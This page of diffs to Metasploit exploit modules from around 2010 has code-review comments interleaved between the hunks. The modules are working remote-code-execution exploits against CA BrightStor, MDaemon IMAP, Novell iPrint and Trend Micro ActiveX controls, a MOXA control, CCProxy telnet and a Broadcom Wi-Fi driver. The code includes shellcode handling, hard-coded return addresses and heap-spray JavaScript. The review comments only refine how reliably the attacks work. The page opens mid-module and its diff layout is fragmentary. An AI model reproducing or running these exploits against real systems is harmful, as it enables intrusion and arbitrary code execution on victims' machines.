bssid = ("\x00" * 2) + rand_text(4)
src = ("\x90" * 4) + "\xeb\x2b"
seq = [rand(255)].pack('n')

buff = rand_text(75)
buff[0, 2] = "\xeb\x49"
buff[71, 4] = [target.ret].pack('V')

frame =
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
src + # src
bssid + # bssid
seq + # seq
rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x00\x05" + # capability flags

# ssid tag
"\x00" + ssid.length.chr + ssid +

# supported rates
"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +

# current channel
"\x03" + "\x01" + channel.chr +

# eip was his name-o
"\x01" + buff.length.chr + buff +

payload.encoded

return frame
end

end

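Review bot: the build numbers disagree at the first target: the comment `# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)` sits directly above `[ 'Windows XP SP2 (5.1.2600.2122), A5AGU.sys 1.0.1.41'`, and since `Ret` (`jmp edi`) and `KiIdleLoopAddress` are tied to one ntoskrnl build, one of the two numbers is wrong and should be corrected before a user matches it against their kernel version. In the description, the fix is said to ship in driver v1.21 while the only vendor URL in References is `DWLG132_driver_102.zip`; either label that link as the vulnerable build or add the fixed one. Typo in the same paragraph: "has fixed the flaw it the latest version" should read "in the latest version".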
@ -1,89 +1,84 @@
##
# $Id: tape_engine_8A.rb 10551 2010-10-05 12:38:46Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = AverageRanking
Rank = AverageRanking

include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::DCERPC

def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow
the buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10551 $',
'References' =>
[
[ 'OSVDB', '68330'],
[ 'URL', 'http://www.metasploit.com/users/mc' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'BrightStor ARCserve r11.5/Windows 2003', { 'Ret' => 0x28eb6493 } ],
],
'DisclosureDate' => 'Oct 4 2010',
'DefaultTarget' => 0))
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow
the buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '68330'],
[ 'URL', 'http://www.metasploit.com/users/mc' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'BrightStor ARCserve r11.5/Windows 2003', { 'Ret' => 0x28eb6493 } ],
],
'DisclosureDate' => 'Oct 4 2010',
'DefaultTarget' => 0))

register_options([ Opt::RPORT(6502) ], self.class)
end
register_options([ Opt::RPORT(6502) ], self.class)
end

def exploit
def exploit

connect
connect

handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")

dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")

request = "\x00\x04\x08\x0c\x05\x00\x00\x00\x00\x00"
request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
request = "\x00\x04\x08\x0c\x05\x00\x00\x00\x00\x00"
request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

dcerpc.call(0x2B, request)
dcerpc.call(0x2B, request)

sploit = NDR.long(4)
sploit << NDR.string(rand_text_alpha_upper(1002) + [target.ret].pack('V') + payload.encoded + "\x00")
sploit = NDR.long(4)
sploit << NDR.string(rand_text_alpha_upper(1002) + [target.ret].pack('V') + payload.encoded + "\x00")

print_status("Trying target #{target.name}...")
print_status("Trying target #{target.name}...")

begin
dcerpc_call(0x8A, sploit)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end
begin
dcerpc_call(0x8A, sploit)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end

handler
disconnect
handler
disconnect

end
end

end
=begin

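Review bot: the class name is left as `Metasploit3 < Msf::Exploit::Remote` while the moxa_mediadbplayback.rb hunk further down this page renames it to `MetasploitModule` in the same header-modernisation pass; apply the rename here too, otherwise the two files end up on different framework conventions. In the body, `dcerpc.call(0x2B, request)` runs with no rescue while the later `dcerpc_call(0x8A, sploit)` is wrapped in `rescue Rex::Proto::DCERPC::Exceptions::NoResponse`; if the 0x2B call only primes the tape engine, guard it the same way (and use the `dcerpc_call` wrapper for both) so a silent server does not abort the module before the overflow is sent. References still carry only `[ 'OSVDB', '68330']` and an author URL; no CVE is added, although the same change adds one for the MOXA module.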
@ -94,4 +89,4 @@ long sub_100707D0 (
[in] long arg_2,
[in][ref][string] char * arg_3
);
=end
=end

@ -1,83 +0,0 @@
##
# $Id: mdaemon_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::Imap

def initialize(info = {})
super(update_info(info,
'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow',
'Description' => %q{
This module exploits a buffer overflow in the CRAM-MD5
authentication of the MDaemon IMAP service. This
vulnerability was discovered by Muts.
},
'Author' => [ 'anonymous' ],
'License' => BSD_LICENSE,
'Version' => '$Revision: 9583 $',
'References' =>
[
[ 'CVE', '2004-1520'],
[ 'OSVDB', '11838'],
[ 'BID', '11675'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ],
],
'DisclosureDate' => 'Nov 12 2004',
'DefaultTarget' => 0))
end

def exploit
connect

print_status("Asking for CRAM-MD5 authentication...")
sock.put("a001 authenticate cram-md5\r\n")
res = sock.get_once


print_status("Received CRAM-MD5 answer: #{res.chomp}")
# Magic no return-address exploitation ninjaness!
buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff"
req = Rex::Text.encode_base64(buf) + "\r\n"
sock.put(req)
res = sock.get_once

print_status("Received authentication reply: #{res.chomp}")
print_status("Sending LOGOUT to close the thread and trigger an exception")
sock.put("a002 LOGOUT\r\n")
res = sock.get_once

print_status("Received LOGOUT reply: #{res.chomp}")
select(nil,nil,nil,1)

handler
disconnect
end

end

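Review bot: the hunk deletes the whole module and nothing on the page says why (no replacement file, no note); a one-line reason belongs with a removal like this. For the record, should the module be kept anywhere: each of the three `res = sock.get_once` lines is followed by `res.chomp`, which raises NoMethodError when the server closes the socket without replying (get_once returns nil), so `res.to_s.chomp` or a nil check is needed. The jump-back `"\xe9\x05\xfd\xff\xff"` (jmp -763) after `'AAAA' + payload.encoded + make_nops(258)` lands on the start of the payload only while `'Space' => 500` is honoured; the 258 and the 500 are coupled and deserve a comment saying so.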
@ -1,154 +0,0 @@
##
# $Id: novelliprint_callbackurl.rb 10429 2010-09-21 18:46:29Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

##
# novelliprint_callbackurl.rb
#
# Novell iPrint Client ActiveX Control call-back-url Buffer Overflow exploit for the Metasploit Framework
#
# Exploit successfully tested on the following platforms:
# - Novell iPrint Client 5.40 on Internet Explorer 7, Windows XP SP3
# - Novell iPrint Client 5.42 on Internet Explorer 7, Windows XP SP3
# - Novell iPrint Client 5.42 on Internet Explorer 7, Windows Vista SP2
#
# ienipp.ocx version tested:
# File Version: 5.4.0.0 and 5.4.2.0
# ClassID: 36723F97-7AA0-11D4-8919-FF2D71D0D32C
# RegKey Safe for Script: True
# RegKey Safe for Init: True
# KillBitSet: False
#
# References:
# - CVE-2010-1527
# - OSVDB 67411
# - http://secunia.com/secunia_research/2010-104/ - Original advisory by Carsten Eiram, Secunia Research
# - http://www.exploit-db.com/exploits/15042/ - MOAUB #19 exploit
# - http://www.exploit-db.com/moaub-19-novell-iprint-client-browser-plugin-call-back-url-stack-overflow/ - MOAUB #14 binary analysis
# - http://www.rec-sec.com/2010/09/21/novell-iprint-callbackurl-buffer-overflow-exploit/ - Metasploit exploit by Trancer, Recognize-Security
#
# Trancer
# http://www.rec-sec.com
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info = {})
super(update_info(info,
'Name' => 'Novell iPrint Client ActiveX Control call-back-url Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42.
When sending an overly long string to the 'call-back-url' parameter in an
op-client-interface-version action of ienipp.ocx an attacker may be able to
execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
'Version' => '$Revision: 10429 $',
'References' =>
[
[ 'CVE', '2010-1527' ],
[ 'OSVDB', '67411'],
[ 'URL', 'http://secunia.com/secunia_research/2010-104/' ], # Carsten Eiram, Secunia Research
[ 'URL', 'http://www.exploit-db.com/exploits/15042/' ], # MOAUB #19
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
],
'DisclosureDate' => 'Aug 20 2010',
'DefaultTarget' => 0))
end

def autofilter
false
end

def check_dependencies
use_zlib
end

def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)

# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

# Setup exploit buffers
nops = Rex::Text.to_unescape([target.ret].pack('V'))
ret = [target.ret].pack('V')
ret = ret * 250
blocksize = 0x40000
fillto = 500
offset = target['Offset']

# ActiveX parameters
clsid = "36723F97-7AA0-11D4-8919-FF2D71D0D32C"

# Randomize the javascript variable names
ienipp = rand_text_alpha(rand(100) + 1)
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_ret = rand_text_alpha(rand(100) + 1)
j_headersize = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_block = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)

html = %Q|<html>
<script>
var #{j_shellcode} = unescape('#{shellcode}');
var #{j_nops} = unescape('#{nops}');
var #{j_headersize} = 20;
var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace});
var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace});
while (#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
var #{j_memory} = new Array();
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode};
}
</script>
<object classid='clsid:#{clsid}' id='#{ienipp}'>
<param name='operation' value='op-client-interface-version' />
<param name='result-type' value='url' />
<param name='call-back-url' value='#{ret}' />
</object>
</html>|

print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

# Transmit the response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })

# Handle the payload
handler(cli)
end

end

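Review bot: `offset = target['Offset']` reads a key that the single `Targets` entry never defines, and neither `offset` nor `j_ret` is used afterwards; both should go (or the key should exist). The header lists tests on iPrint 5.40/5.42 with IE 7 on Windows XP SP3 and Vista SP2, but the one target is named `Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7`; the target string should say what was actually tested. Note also that `nops` here is built from `[target.ret].pack('V')` rather than `make_nops`, so the 0x0A0A0A0A spray address doubles as the sled, and `call-back-url` receives 250 copies of that same value, which is 1000 raw newline bytes inside a single-quoted attribute; a comment that this is intentional would spare the next reader a double-take, especially as the same variable name holds real NOPs in the Trend Micro module on this page.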
@ -1,147 +0,0 @@
##
# $Id: trendmicro_extsetowner.rb 10538 2010-10-04 04:26:09Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

##
# trendmicro_extsetowner.rb
#
# Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution exploit for the Metasploit Framework
#
# Exploit successfully tested on the following platforms:
# - Trend Micro Internet Security Pro 2010 on Internet Explorer 7, Windows XP SP3
# - Trend Micro Internet Security Pro 2010 on Internet Explorer 7, Windows Vista SP2
#
# UfPBCtrl.dll version tested:
# File Version: 17.50.0.1366
# ClassID: 15DBC3F9-9F0A-472E-8061-043D9CEC52F0
# RegKey Safe for Script: True
# RegKey Safe for Init: True
# KillBitSet: False
#
# References:
# - CVE-2010-3189
# - OSVDB 67561
# - http://www.zerodayinitiative.com/advisories/ZDI-10-165/ - Original advisory by Andrea Micalizzi aka rgod via Zero Day Initiative
# - http://www.exploit-db.com/exploits/14878/ - MOAUB #03 exploit
# - http://www.exploit-db.com/trend-micro-internet-security-pro-2010-activex-extsetowner-remote-code-execution/ - MOAUB #03 binary analysis
# - http://www.rec-sec.com/2010/09/28/trend-micro-internet-security-2010-rce-exploit/ - Metasploit exploit by Trancer, Recognize-Security
#
# Trancer
# http://www.rec-sec.com
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info = {})
super(update_info(info,
'Name' => 'Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in Trend Micro
Internet Security Pro 2010 ActiveX.
When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
'Version' => '$Revision: 10538 $',
'References' =>
[
[ 'CVE', '2010-3189' ],
[ 'OSVDB', '67561'],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-165/' ], # Andrea Micalizzi aka rgod via Zero Day Initiative
[ 'URL', 'http://www.exploit-db.com/exploits/14878/' ], # MOAUB #03
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x00C750A1 } ] #??
],
'DisclosureDate' => 'Aug 25 2010',
'DefaultTarget' => 0))
end

def autofilter
false
end

def check_dependencies
use_zlib
end

def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)

# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

# Setup exploit buffers
nops = Rex::Text.to_unescape(make_nops(4))
ret = Rex::Text.to_unescape([target.ret].pack('V'))
blocksize = 0x40000
fillto = 500

# ActiveX parameters
clsid = "15DBC3F9-9F0A-472E-8061-043D9CEC52F0"

# Randomize the javascript variable names
ufpbctrl = rand_text_alpha(rand(100) + 1)
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_ret = rand_text_alpha(rand(100) + 1)
j_headersize = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_block = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)

html = %Q|<html>
<object classid='clsid:#{clsid}' id='#{ufpbctrl}'></object>
<script>
var #{j_shellcode} = unescape('#{shellcode}');
var #{j_nops} = unescape('#{nops}');
var #{j_headersize} = 20;
var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace});
var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace});
while (#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
var #{j_memory} = new Array();
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode};
}
#{ufpbctrl}.extSetOwner(unescape('#{ret}'));
</script>
</html>|

print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

# Transmit the response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })

# Handle the payload
handler(cli)
end
end

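Review bot: the only target reads `{ 'Ret' => 0x00C750A1 } ] #??`, a return address the author's own comment marks as unverified; a module should not carry `#??` on the one value it depends on, so either confirm it against the two tested builds or explain how it is reached (500 blocks of 0x40000 bytes would cover that range, but the code should say so). `j_ret` is generated and never used. As in the iPrint module above, the header says tested on XP SP3 and Vista SP2 while the target string says `Windows XP SP0-SP2`.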
@ -1,85 +1,79 @@
##
# $Id: moxa_mediadbplayback.rb 10914 2010-11-05 02:58:01Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
class MetasploitModule < Msf::Exploit::Remote

Rank = AverageRanking
Rank = AverageRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'MOXA MediaDBPlayback ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When
sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5)
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 10914 $',
'References' =>
[
[ 'OSVDB', '68986'],
[ 'URL', 'http://www.moxa.com' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0a0a0a0a } ]
],
'DisclosureDate' => 'Oct 19 2010',
'DefaultTarget' => 0))
def initialize(info = {})
super(update_info(info,
'Name' => 'MOXA MediaDBPlayback ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When
sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5)
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'References' =>
[
[ 'CVE', '2010-4742' ],
[ 'OSVDB', '68986'],
[ 'URL', 'http://www.moxa.com' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0a0a0a0a } ]
],
'DisclosureDate' => 'Oct 19 2010',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
], self.class)
end
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
], self.class)
end

def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))

# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))

# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)

content = %Q|
content = %Q|
<html>
<object id ='#{vname}' classid='clsid:5B32067A-121B-49DE-8182-91EB13DDF8D6'></object>
<script language ="javascript">

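Review bot: `ret = Rex::Text.uri_encode([target.ret].pack('L'))` packs the return address in native byte order while the shellcode one block above is encoded for `Rex::Arch.endian(target.arch)` and every other module on this page uses `pack('V')`; since this hunk already touches the file, switch to `'V'` so the address is little-endian regardless of the host running the framework. The rename to `MetasploitModule` and the new header are applied here but not in the tape_engine_8A.rb hunk above; keep the pass consistent across files. Adding `[ 'CVE', '2010-4742' ]` is the one substantive change besides the header.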
@ -98,11 +92,11 @@ for (#{var_i} = 0; #{var_i} < 14500; #{var_i}++) { #{rand8} = #{rand8} + unescap
#{vname}.PlayFileName = #{rand8};
</script>
</html>
|
|

print_status("Creating '#{datastore['FILENAME']}' file ...")
print_status("Creating '#{datastore['FILENAME']}' file ...")

file_create(content)
end
file_create(content)
end

end
end

@ -1,87 +0,0 @@
##
# $Id: ccproxy_telnet_ping.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
'Description' => %q{
This module exploits the YoungZSoft CCProxy <= v6.2 suite
Telnet service. The stack is overwritten when sending an overly
long address to the 'ping' command.
},
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2004-2416' ],
[ 'OSVDB', '11593' ],
[ 'BID', '11666 ' ],
[ 'URL', 'http://milw0rm.com/exploits/621' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 1012,
'BadChars' => "\x00\x07\x08\x0a\x0d\x20",
},
'Platform' => ['win'],
'Targets' =>
[
# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll
[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll
[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll
[ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll
[ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
],
'DisclosureDate' => 'Nov 11 2004'))

register_options(
[
Opt::RPORT(23),
], self.class)
end

def check
connect
banner = sock.get_once(-1,3)
disconnect

if (banner =~ /CCProxy Telnet Service Ready/)
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end

def exploit
connect

sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
sock.put(sploit + "\r\n")

handler
disconnect
end

end

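Review bot: `[ 'BID', '11666 ' ]` carries a trailing space inside the BID string, which is carried into the generated SecurityFocus link; trim it. The layout `"p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)` only puts the return address at the right offset because `payload.encoded` is padded out to `'Space' => 1012`; a comment stating that offset would protect anyone who later changes Space, and the purpose of the trailing `make_nops(7)` after the return address is not documented anywhere in the file.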
@ -1,81 +1,90 @@
##
# $Id: broadcom_wifi_ssid.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

module Msf
class Metasploit3 < Msf::Exploit::Remote
Rank = LowRanking

class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote

include Exploit::Lorcon
include Exploit::KernelMode
include Msf::Exploit::Lorcon2
include Msf::Exploit::KernelMode

def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Broadcom Wireless Driver Probe Response SSID Overflow',
'Description' => %q{
This module exploits a stack overflow in the Broadcom Wireless driver
that allows remote code execution in kernel mode by sending a 802.11 probe
response that contains a long SSID. The target MAC address must
be provided to use this exploit. The two cards tested fell into the
00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges.
This module exploits a stack buffer overflow in the Broadcom Wireless driver
that allows remote code execution in kernel mode by sending a 802.11 probe
response that contains a long SSID. The target MAC address must
be provided to use this exploit. The two cards tested fell into the
00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges.

This module depends on the Lorcon library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon documentation
(external/ruby-lorcon/README) for more information.
This module depends on the Lorcon2 library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},

'Authors' =>
'Author' =>
[
'Chris Eagle', # initial discovery
'Johnny Cache <johnnycsh [at] 802.11mercenary.com>', # the man with the plan
'Johnny Cache <johnnycsh [at] 802.11mercenary.net>', # the man with the plan
'skape', # windows kernel ninjitsu and debugging
'hdm' # porting the C version to ruby
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 3583 $',
'Version' => '$Revision: 9669 $',
'References' =>
[
['CVE', '2006-5882'],
['OSVDB', '30294'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-11-11-2006.html'],
],
'Privileged' => true,

'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},

'Payload' =>
{
'Space' => 500
},
'Platform' => 'win',
'Targets' =>
'Targets' =>
[
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
[ 'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10',
{
'Ret' => 0x8066662c, # jmp edi
'Platform' => 'win',
'Payload' =>
|
||||
'Payload' =>
|
||||
{
|
||||
'ExtendedOptions' =>
|
||||
'ExtendedOptions' =>
|
||||
{
|
||||
'Stager' => 'sud_syscall_hook',
|
||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
||||
'Recovery' => 'idlethread_restart',
|
||||
'KiIdleLoopAddress' => 0x804dbb27,
|
||||
|
||||
'KiIdleLoopAddress' => 0x804dbb27,
|
||||
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
],
|
||||
|
||||
|
||||
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
|
||||
[ 'Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10',
|
||||
{
|
